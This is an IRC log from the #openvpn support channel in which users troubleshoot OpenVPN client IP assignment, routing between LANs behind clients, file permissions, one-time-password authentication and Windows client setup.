03:47 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for 03:47 <@vpnHelper> a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 03:47 <@krzee> theres some flowcharts for troubleshooting lans behind openvpn 03:47 <@krzee> if you remember and treat any subnet behind the other peer as a "lan" then the flowcharts should help 03:48 <@krzee> if you get stuck, tcpdump is your friend, use it everywhere on the tun devices 03:56 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has joined #openvpn 04:00 -!- niervol1 [~krystian@193.106.244.150] has joined #openvpn 04:00 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has quit [Client Quit] 04:01 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has joined #openvpn 04:01 -!- niervol [~krystian@193.106.244.150] has quit [Ping timeout: 260 seconds] 04:09 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn 04:09 < oskie> hello. is it normal for OpenVPN to assign all clients the same IP address? 04:10 < oskie> (with tun config) 04:10 <@krzee> no, you need to use different certs for each client 04:10 <@krzee> you are only using 1 now, for testing, right? 04:10 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Remote host closed the connection] 04:11 -!- valparaiso is now known as valparaiso_reset 04:11 -!- valparaiso_reset is now known as valparaiso 04:11 < oskie> krzee: I'm using openvpn-auth-ldap and client-cert-not-required 04:11 <@krzee> oh 04:11 <@krzee> !authpass 04:11 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name 04:11 <@krzee> use username-as-common-name 04:12 < oskie> yeah, I'm using that too, but clients still receive the same IP... is that normal? I mean, does routing even work? 04:12 < oskie> or something is very wrong 04:12 <@krzee> no, they must be bumping eachother off 04:12 <@krzee> lemme see your server config 04:13 < oskie> yeah because that's what I think is happening right now 04:13 -!- amir_ [~amir@unaffiliated/amir] has joined #openvpn 04:13 < oskie> hmm should I paste it somewhere? 04:13 <@krzee> yep 04:13 <@krzee> without all the comments if it has them 04:14 <@krzee> type !configs if you need to know how to strip them 04:16 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has left #openvpn [] 04:17 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 04:18 -!- brute11k [~brute11k@89.249.230.92] has quit [Ping timeout: 260 seconds] 04:18 < oskie> hmm but I use client config files as well 04:18 < oskie> let's use pastebin or something, wait 04:19 < oskie> http://pastebin.com/t6EyL0pL 04:19 -!- amir_ [~amir@unaffiliated/amir] has quit [Ping timeout: 256 seconds] 04:20 <@krzee> perfect 04:20 <@krzee> and the ccd file[s] 04:21 < oskie> they are simple: there is one file for each access level. they have one line: ifconfig-push 10.9.x.1 10.9.x.2 04:21 < oskie> and there are multiple users for each group (maybe that's the problem) 04:21 <@krzee> 10.9.1.0 and 10.9.2.0 are behind clients and 10.8.0.0/16 is behind the server, right? 04:21 < oskie> yep! 10.9.0.0 is client as well 04:22 <@krzee> let me see a server log at verb 4 with a client connecting, then another connecting 04:23 <@krzee> you can hide public ips if you like 04:23 < oskie> that's going to be a lot of text... 04:23 <@krzee> yes, it is 04:23 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection reset by peer] 04:23 <@krzee> pastebin wont mind ;] 04:25 < oskie> but let me first ask: can I even use ifconfig-push 10.9.1.1 10.9.1.2 for two different users? will they not get the same IP? 04:25 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 04:26 <@krzee> definitely dont do that 04:26 <@krzee> i dont know what will happen 04:26 < oskie> ok then that's my problem 04:27 < oskie> but I can't seem to use ifconfig-pool in the client config files 04:27 <@krzee> right 04:27 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Quit: leaving] 04:28 <@krzee> you can code a client-connect script if you need that flexibility 04:28 < oskie> so is there a way to dynamically assign multiple users to a different subnet than the default 04:28 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 04:28 <@krzee> !iporder 04:28 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp 04:28 < oskie> ah, ok 04:30 < oskie> if I make such a script, I need to figure out how to dynamically select IPs 04:30 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 264 seconds] 04:30 < oskie> and then write that as "ifconfig-push X Y" in the tmpfile? 04:30 <@krzee> right 04:31 <@krzee> dynamic selection should be easy enough, 6, 10, 14, 18 etc etc 04:31 < oskie> and that's "ifconfig-push SERVERIP CLIENTIP" right? 04:31 <@krzee> oh and 1 since its not the servers subnet 04:31 <@krzee> !static 04:31 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 04:32 <@krzee> clientip serverip 04:32 <@krzee> well kinda 04:32 < oskie> ah ok! 04:32 <@krzee> clientip internal-to-openvpn-ip 04:32 <@krzee> which represents the server ip for routing purposes 04:32 < oskie> but both need to be dynamic? I can't use the same serverip for all clients, can I? 04:33 <@krzee> both change 04:33 <@krzee> .2 .1 .6 .5 .10 .9 04:33 -!- amir_ [~amir@unaffiliated/amir] has joined #openvpn 04:33 < oskie> hm, you're skipping .4 and .3? 04:34 <@krzee> skipping 4 04:34 <@krzee> the 3 was you doing math bad ;] 04:36 <@krzee> in your topology, if it is ifconfig-push x y, then y is always 1 less than x 04:36 <@krzee> and they both increase by 4 to the next /30 04:36 <@krzee> !/30 04:36 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 04:36 < oskie> ah ok 04:37 <@krzee> you dont want to use topology subnet 04:37 < oskie> now I just need to code a client-connect script that checks user group in Active Directory and assigns IP based on that 04:37 < oskie> why not topology subnet? 04:37 <@krzee> because clients can change their ip with ifconfig 04:37 < oskie> ah ok 04:37 <@krzee> however with net30 (default) they cant reach the server after doing so 04:38 <@krzee> since you are doing a lot based on ip, that is important 04:38 <@krzee> (i assume the seperation of subnets is for firewall rules) 04:39 < oskie> does that mean that a user can disrupt another user by changing his IP in topology=subnet? 04:39 < oskie> or I mean in topology mode 04:39 <@krzee> you said it right, topology subnet 04:40 <@krzee> and i dont know, may as well test it though :D 04:49 < oskie> great, I think that did it. many thanks krzee! 04:49 <@krzee> yw =] 04:50 < oskie> is it possible to for two openvpn instances to share the same --server ip address? 04:50 <@krzee> no 04:50 < oskie> ok, good 04:51 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 05:03 < pppingme> as in the ip's assigned to clients? no 05:11 -!- gardar [~gardar@gardar.net] has joined #openvpn 05:14 -!- smooc [~smooc@62.28.98.58] has joined #openvpn 05:23 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Remote host closed the connection] 05:31 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 05:42 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 05:46 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 05:46 < videl> Hi 05:57 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 06:04 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Read error: No route to host] 06:07 -!- pi_ [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 06:07 -!- pi_ is now known as videl 06:07 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 06:10 -!- brute11k [~brute11k@89.249.231.11] has joined #openvpn 06:20 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 06:22 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 265 seconds] 06:45 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 07:00 -!- smooc [~smooc@62.28.98.58] has quit [Read error: Connection reset by peer] 07:17 -!- ade_b [~Ade@koln-5d81bfd4.pool.mediaWays.net] has joined #openvpn 07:17 -!- ade_b [~Ade@koln-5d81bfd4.pool.mediaWays.net] has quit [Changing host] 07:17 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:39 -!- brute11k [~brute11k@89.249.231.11] has quit [Ping timeout: 240 seconds] 08:02 -!- mattock_afk is now known as mattock 08:03 -!- brute11k [~brute11k@89.249.231.106] has joined #openvpn 08:12 < fys> ugh .. today i go to the dentist for the first time in around 4 years. 08:22 -!- m0sphere [~m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Read error: Connection reset by peer] 08:23 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 08:23 -!- moore1 [~moore@41.206.15.31.vgccl.net] has joined #openvpn 08:28 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 08:36 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 08:37 -!- smooc [~smooc@62.28.98.58] has joined #openvpn 08:48 -!- Porkepix [~Porkepix@dispo-82-248-141-132.adsl.proxad.net] has quit [Ping timeout: 245 seconds] 08:50 -!- emate [~marcin@81.219.183.142] has quit [Quit: leaving] 08:50 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has joined #openvpn 08:57 -!- dvl-_ [~dan@pool-71-162-210-170.phlapa.fios.verizon.net] has joined #openvpn 08:58 -!- moore1 [~moore@41.206.15.31.vgccl.net] has quit [] 08:59 < dvl-_> I have a working OpenVPN 2.2.2 routed solution on FreeBSD 8.2 and now I'm trying to make it run as openvpn:openvpn, not nobody:nobody. The problem is /usr/local/etc/openvpn/keys/crl.pem 08:59 < dvl-_> CRL: cannot read: /usr/local/etc/openvpn/keys/crl.pem: Permission denied (errno=13) 08:59 < dvl-_> However: # ls -l /usr/local/etc/openvpn/keys/crl.pem 08:59 < dvl-_> -r--r--r-- 1 openvpn openvpn 499 Feb 26 2009 /usr/local/etc/openvpn/keys/crl.pem 09:00 < dvl-_> oh.... wait... :) 09:00 < dvl-_> fixed. :) 09:01 < dvl-_> it was /usr/local/etc/openvpn still root:wheel 09:04 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Ping timeout: 245 seconds] 09:13 <@ecrist> :) 09:16 < dvl-_> Love it when explaining finds the problem. 09:16 < dvl-_> ecrist FYI: writing a post on ssl-admin for http://dan.langille.org/ ... should be ready latest today. 09:17 < dvl-_> ecrist I keep seeing this FAIL but no message: 09:17 < dvl-_> Creating initial CRL...Using configuration from /usr/local/etc/ssl-admin/openssl.conf 09:17 < dvl-_> Enter pass phrase for /usr/local/etc/ssl-admin/active/ca.key: 09:17 < dvl-_> FAILssl-admin installed Wed Jan 2 15:16:46 UTC 2013 09:17 -!- niervol1 [~krystian@193.106.244.150] has quit [Remote host closed the connection] 09:17 < dvl-_> See that FAIL? Kind of.. .confusing. 09:18 < dvl-_> if I quit and go back into ssl-admin, no errors. 09:21 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 09:24 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 09:26 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 240 seconds] 09:30 <@dazo> dvl-_: using chroot? 09:30 <@dazo> duh ... you found the issue 09:37 <@ecrist> dvl-_: that FAIL message is a red herring 09:38 <@ecrist> something i've never bothered fixing 09:38 <@ecrist> I'll fix it soon, since you've noticed/pointed it out 09:40 < dvl-_> ecrist: OK, I'll mention that in the article. 09:41 < dvl-_> dazo: no, no chroot involved, but that's an interesting idea. All I'm doing is running openvpen as openvpn:openvpn and chown/chmod all the files so only openvpn can read them. 09:46 < dvl-_> ecrist: I can create tickets at https://www.secure-computing.net/trac/report if you like? I have other items you might want to look at (e.g. spelling) 09:46 <@vpnHelper> Title: Available Reports – SCN Open Source (at www.secure-computing.net) 09:46 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has quit [Quit: leaving] 09:49 <@ecrist> dvl-_: that would be excellent! 09:50 < dvl-_> ecrist: will do. :) 09:50 <@ecrist> I think I need to get a user/pass from you, since that uses .htaccess for auth 09:51 -!- smooc_ [~smooc@95.69.51.167] has joined #openvpn 09:51 <@ecrist> anon ticket creation is disabled (spam) 09:52 -!- smooc [~smooc@62.28.98.58] has quit [Ping timeout: 252 seconds] 10:11 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 10:21 -!- master_of_master [~master_of@p57B55644.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:23 -!- master_of_master [~master_of@p57B556D3.dip.t-dialin.net] has joined #openvpn 10:26 -!- EmperorTom [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 10:27 -!- EmperorTom is now known as _quadDamage 10:44 -!- hjf [~hjf@184-0-17-190.fibertel.com.ar] has quit [Remote host closed the connection] 10:55 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:56 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Ping timeout: 240 seconds] 11:00 -!- raidz_away is now known as raidz 11:01 -!- krzee [~k@openvpn/community/support/krzee] has joined #openvpn 11:01 -!- mode/#openvpn [+o krzee] by ChanServ 11:09 -!- EugeneKay [eugene@itvends.com] has quit [Quit: ZNC - http://znc.in] 11:09 -!- EugeneKay [eugene@go-without.me] has joined #openvpn 11:33 -!- plaisthos [~arne@kamera.blinkt.de] has joined #openvpn 11:35 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 11:41 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection] 11:55 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 11:58 -!- butch128 [~butch@TOROON63-1176061240.sdsl.bell.ca] has joined #openvpn 11:58 -!- smooc_ [~smooc@95.69.51.167] has quit [Ping timeout: 248 seconds] 11:59 < butch128> Trying to get routing working between my openvpn server, and 2 subnets i have connecting to it - anyone willing to comment on what I'm doing wrong? 12:01 < kisom> butch128: My car wont start, any comment on what I'm doing wrong? 12:02 <+pekster> Are these subnets behind your OpenVPN server or your clients? 12:02 < butch128> kisom: point taken, sec 12:02 < butch128> My setup is... OpenVPN Server (10.8.0.1), DD-WRT-1 (10.8.0.6, 192.168.5.0/24) DD-WRT-2 (10.8.0.18, 192.168.1.0/24). From a machine on either subnet (say 192.168.1.100) i'd love to be able to just connect to 192.168.5.1. 12:02 <+pekster> !clientlan 12:02 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 12:02 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 12:02 < butch128> yep, ipforwarding is enabled 12:02 < butch128> ive added ccd files 12:03 < butch128> and iroute push entries 12:03 <+pekster> Have you seen that flowchart? And followed it? 12:03 < butch128> (on the server) 12:03 < butch128> i will do that now, thanks 12:03 <+pekster> That flowchart walks you through every step you need to get client-LAN connectivity set up. Feel free to ask here if you get stuck and need help, but the author of that diagram put time into making it very complete ;) 12:04 <+pekster> (just be sure not to skip steps :P ) 12:04 < butch128> so i'm at the final step "Add a route to the router so it knows how to reach the vpn subnet" 12:04 < kisom> butch128: If you get stuck, paste your config files, routing table, iptables rules and ifconfig output somewhere and I'll have a look. 12:04 < butch128> from the router (192.168.1.1) i can ping 192.168.5.1! and its awesome! 12:05 < butch128> from my home machine though (192.168.1.100) i cannot... 12:05 <+pekster> butch128: Are you VPN clients (your *WRT devices) the default router on their respective networks? 12:05 < butch128> thanks, i'll paste the route and such 12:05 < butch128> yes, they are the defaults 12:05 <+pekster> Yea, then configs, logs, and routing views would help. Since they're the defaults, something sounds off with your routing setup (or possibly your firewalls) 12:05 < butch128> yea, turned off the firewalls too... no go 12:06 < kisom> butch128: Can you paste your stuff here? http://piratepad.net/openvpn 12:06 <@vpnHelper> Title: PiratePad: openvpn (at piratepad.net) 12:07 < butch128> http://piratepad.net/ep/pad/view/ro.rzwEcZAY/latest 12:08 <@vpnHelper> Title: PiratePad: ro.rzwEcZAY / Latest text of pad openvpn (at piratepad.net) 12:10 < kisom> butch128: Lots of routers and servers... I'll probably need a diagram on how everything is connected 12:11 < butch128> hmmm 12:11 < butch128> Server (10.8.0.1) 12:11 < butch128> Router#1 (192.168.1.1, 10.8.0.18), Router #2 (192.168.5.1, 10.8.0.1) 12:12 < butch128> two routers connect to server 12:12 < butch128> all that works smashingly well 12:12 < kisom> OK, and the server routes traffic between your routers? 12:12 < butch128> it seems to, from Router #1 (192.168.1.1) i can ssh into 192.168.5.1 (router #2) 12:13 < butch128> hmm... interesting... i didnt try this before.. from router #2 (192.168.5.1) i cannot access router#1... (192.168.1.1)... even though firewalls are disabled and the route table looks correct... that could be my problem, maybe? 12:15 <+pekster> butch128: Can you do that from the VPN server? 12:15 <+pekster> (ie: the flowchart block that asks "Can you ping the lan IP of the client?" ) 12:15 < kisom> butch128: Can you please paste your iptables config and ifconfig on the server? 12:15 < butch128> root@li169-68:/etc/openvpn# ping 192.168.5.1 12:15 < butch128> PING 192.168.5.1 (192.168.5.1) 56(84) bytes of data. 12:15 < butch128> 64 bytes from 192.168.5.1: icmp_seq=1 ttl=64 time=90.0 ms 12:15 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 12:15 < butch128> huh... 12:16 < butch128> root@li169-68:/etc/openvpn# ping 192.168.1.1 12:16 < butch128> PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. 12:16 < butch128> ^C 12:16 < butch128> --- 192.168.1.1 ping statistics --- 12:16 < butch128> 4 packets transmitted, 0 received, 100% packet loss, time 2999ms 12:16 < butch128> so it only pings one way... 12:16 <+pekster> Sounds like firewall. kisom's suggestion of looking at iptables rules is a good next troubleshooting step 12:16 < kisom> Yes, really sounds like a firewall 12:16 < kisom> Pings do not go "one way" 12:16 < kisom> :P 12:17 < butch128> hmmm k 12:17 <+pekster> Well, the echo-request does, but that's getting off-topic :P 12:17 < butch128> thanks, i'll double check when i'm home whether its disabled... grr 12:17 < butch128> but almost 100% it is... 12:17 < butch128> thanks for the help, it sounds like i didnt miss a step in the config then? 12:18 < kisom> Probably not since you can ping "one way" over the VPN. 12:18 <+pekster> Both clients have a good looking routing view (they route eto each other's LANs across the VPN) so my guess is your firewall isn't allowing it on the "dark" system (the one you can't reach) 12:18 < butch128> yea, k 12:19 <+pekster> If you explicitly trust all traffic coming across the secured VPN pipe, something like this tends to work well: '-A INPUT -i tun+ -j ACCEPT' and '-A FORWARD -i tun+ -j ACCEPT' 12:19 <+pekster> Tune for more security if you require it 12:20 <@krzee> ild use -I over -A but yep 12:20 < butch128> k, thanks, i'll try that too 12:20 <+pekster> krzee: That's in iptables-restore syntax ;) 12:20 < kisom> I just woke up, btw 12:20 < butch128> i turned off the firewall in dd-wrt, guess that may not have been enough 12:20 < kisom> 7 PM over here 12:20 <+pekster> Depends on what "turning off" actually does :\ 12:20 < butch128> very true 12:21 <+pekster> But yea, if your client can ping the server, but server can't ping the client's LAN IP, it sounds very much like your firewall on that client needs fixing 12:22 <@krzee> if you actually "turned off" the firewall in dd-wrt it would stop doing nat and therefor probably not do what you expect of it 12:22 < chrisb> any issues with using OTP PAM with openvpn authentication? on reconnect? 12:23 <@krzee> i believe that depends on settings 12:23 <@krzee> you can use persist settings and keep it cached in memory 12:24 <+pekster> chrisb: Every re-keying event (1h by default) it'll require a full re-auth (certs and un/pw if you use it), so if the OTP changes between uses like a true OTP would, that will cause problems. You can probably do something creative with the management interface and not caching the credentials 12:25 < kisom> Disabling re-keying is an option too 12:25 < kisom> :) 12:26 <+pekster> Sure. Once every "never" you will need to re-key :P 12:26 < chrisb> this would be yubikey, so yes, real OTP 12:26 <@krzee> oh right i forgot bout that lol 12:26 <@krzee> caching a changing pw doesnt help much lol 12:26 <+pekster> chrisb: My recommendation would be to write a un/pw script that requires the actual OTP for the first auth only, then silently "passes" the user through auth without doing any further checking when it's a re-key 12:27 < chrisb> i have always had persist set, because i think my connection is too dodgy 12:27 <+pekster> chrisb: The env-vars available to the script will let you determine if it's a new or existing connection being authenticated 12:27 <+pekster> That does mean you can't use the ovpn PAM plugin as-is, though 12:27 <@krzee> persist is handy when dropping permissions and having your keys properly chmod'ed 12:28 <@krzee> ^ ild go with pekster's option 12:28 <@krzee> that way you keep forward security 12:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 12:32 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 12:35 < chrisb> interesting, thanks for these comments 12:36 < chrisb> pekster: what do you mean by "un/pw script"? 12:36 <+pekster> --user-auth-pass-verify 12:36 -!- butch128 [~butch@TOROON63-1176061240.sdsl.bell.ca] has left #openvpn [] 12:37 < kisom> How does OpenVPN prompt the user for one time passwords btw? 12:43 < |Mike|> why not work with certs? ;x 12:44 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 12:49 < chrisb> |Mike|: i use certs now, i think OTP is better 12:49 < chrisb> |Mike|: am i wrong? 12:54 <@ecrist> you are 12:54 <@ecrist> using both would be good, though 13:00 < dvl-_> ecrist : yes, I need a login for your trac 13:02 < dvl-_> ecrist I just emailed you. :) 13:08 <@ecrist> kk 13:09 <@ecrist> want to pm me a password? 13:10 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:13 -!- dvl-_ [~dan@pool-71-162-210-170.phlapa.fios.verizon.net] has left #openvpn [] 13:14 -!- dvl-_ [~dan@pool-71-162-210-170.phlapa.fios.verizon.net] has joined #openvpn 13:14 < dvl-_> oops 13:14 -!- Syndrom [~syndrom@46.249.58.73] has left #openvpn [] 13:17 -!- dazo is now known as dazo_afk 13:18 < chrisb> ecrist: what is the reasoning that cert + OTP is better than OTP? 13:18 < chrisb> ecrist: the encryption of the data channel? 13:19 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 13:20 < chrisb> http://www.schneier.com/blog/archives/2012/12/china_now_block.html 13:20 <@vpnHelper> Title: Schneier on Security: China Now Blocking Encryption (at www.schneier.com) 13:35 < kisom> Guess the chinese firewall got stateful 13:35 < kisom> Then again, they do not _block_ anything 13:35 < kisom> They just send RST packets 13:35 < kisom> Or at least they did a while back 13:36 <+rob0> RST is TCP. They're detecting openvpn on UDP. 13:37 < kisom> Yeah, I know 13:42 -!- brute11k [~brute11k@89.249.231.106] has quit [Quit: Leaving.] 13:50 <@ecrist> chrisb: because OTP can be shared between users a little easier than certificates. 13:50 <@ecrist> certificates can be revoked 13:51 -!- Devastator [~devas@186.214.14.80] has joined #openvpn 13:51 -!- Devastator [~devas@186.214.14.80] has quit [Changing host] 13:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 13:55 < chrisb> ecrist: meaning that if my OTP list is stolen or copied, i may not be able to remedy, but with certs, i can issue the revocation if I own the CA? 13:59 < dvl-_> I'm not using keys with my crtificiates for OpenVPN. I don't see the benefit of using keys. 13:59 -!- baobei_ [~baobei@208.111.39.160] has joined #openvpn 13:59 < dvl-_> Reasoning: if they can steal a cert, they can steal a key...... 14:00 < dvl-_> Unless, I supply the key each time openvpn starts up. Don't really want to do that.... 14:01 -!- baobei__ [~baobei@208.111.39.160] has joined #openvpn 14:01 -!- baobei_ [~baobei@208.111.39.160] has quit [Read error: Connection reset by peer] 14:11 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 14:25 <@ecrist> chrisb: that's one train of thought 14:25 <@ecrist> though, it's fairly easy to re-issue one-time passwords, as well 14:26 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 245 seconds] 14:32 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 14:43 <@ecrist> dvl-_: most people, I would guess, don't password-protect their client-side keys 14:46 -!- krzee [~k@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 14:50 < dvl-_> ecrist: I'm not protecting my server side cert. The CA is password protected... 14:50 <@ecrist> that's also probably common 14:58 -!- ade_b [~Ade@koln-5d81bfd4.pool.mediaWays.net] has joined #openvpn 14:58 -!- ade_b [~Ade@koln-5d81bfd4.pool.mediaWays.net] has quit [Changing host] 14:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:00 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 15:08 -!- Konigsberg7 [shawnz@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 15:08 -!- Konigsberg7 [shawnz@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 15:09 -!- shawnz [shawnz@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 15:09 -!- whyz [~e@h145n7-n-a31.ias.bredband.telia.com] has left #openvpn ["Leaving"] 15:09 -!- shawnz is now known as Konigsberg7 15:24 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 15:24 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 15:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:24 -!- mode/#openvpn [+o krzee] by ChanServ 15:45 -!- Konigsberg7 [shawnz@c-67-163-13-78.hsd1.il.comcast.net] has quit [Ping timeout: 255 seconds] 16:32 < ade_b> I have my own openvpn server and I have setup my girlfriends linux laptop to use it - how do I do this for a windows laptop 16:33 < ade_b> I cant see anywhere in the windows client to specify the certificates 16:33 < ade_b> I guess I need to create a "Connection Profile" to import - can anyone help me out? 16:36 < ngharo> You create a config and name it with an extension of .ovpn 16:37 -!- baobei__ [~baobei@208.111.39.160] has quit [Ping timeout: 245 seconds] 16:37 < ngharo> the config should look the same as linux except specify 'dev-node' instead of 'dev' iirc 16:49 < plaisthos> ngharo: dev tun/dev tap work fine on windows 16:49 < ade_b> ngharo, ok thanks 16:49 < ngharo> thought you had to match 'dev-node' with the name of the tap interface 16:50 <@krzee> ngharo, you renaming it? 16:50 < ngharo> not me, ade_b 16:50 <@krzee> ahh right 16:50 < ngharo> i shouldnt even be commenting on windows setup. It's been a while since i've done that 16:50 <@krzee> dev-node isnt needed unless renaming 16:51 < ngharo> oh ok 16:52 <@krzee> you know offhand if when i dd a drive to another drive, if all partition info and gpart info gets copied over? 16:52 < ade_b> ngharo, thanks and I put the certs in her "Docs & Settings folders" and just specify the full path? 16:52 < ngharo> ade_b: yep or for easy mode just place them in the ovpn config directory 16:53 < ngharo> krzee: it should. 16:53 < ngharo> pretty sure all the partition info is stored at the beginning of the drive 16:54 < plaisthos> krzee: yes. For gpt you should run gdisk or similar to fix the backup table (it is normally located at the end of the disk) if you are copying to a larger disc 16:55 < ade_b> great, Im using tun interfaces for linux, so I need to change that to tap on Winodows? 16:56 <@krzee> the disk is EXACTLY the same size =] 16:58 < ngharo> ade_b: I don't believe so 16:58 <@krzee> ade_b, you must use tun in windows too 16:58 <@krzee> all sides must agree 16:59 <@krzee> in windows they call it a tap device, but it supports tun mode 16:59 -!- Eagleman7 [~androirc@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 16:59 <@krzee> i have requested a name change to "tuntap device" but it didnt stick 17:00 <+pekster> krzee: The code uses 'tun.c' anyway :P 17:00 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 240 seconds] 17:01 < ade_b> ngharo, krzee thanks 17:01 < plaisthos> pekster: in (very) old version of the windows tap driver, only tap was possible :) 17:02 <+pekster> Ah, hence the device name. Ah well, it'll go well with 'Referer' headers :P 17:03 <@krzee> hah i didnt know there was a time when it was actually tap only 17:03 <@krzee> i guess it makes sense tho, tun emulation mode would kinda have to come after 17:04 -!- mode/#openvpn [+v plaisthos] by krzee 17:07 -!- Eagleman7 [~androirc@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )] 17:12 -!- baobei_ [~baobei@58.37.20.245] has joined #openvpn 17:24 -!- F^4 is now known as F^4[A] 17:31 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 17:37 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 17:38 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has quit [Ping 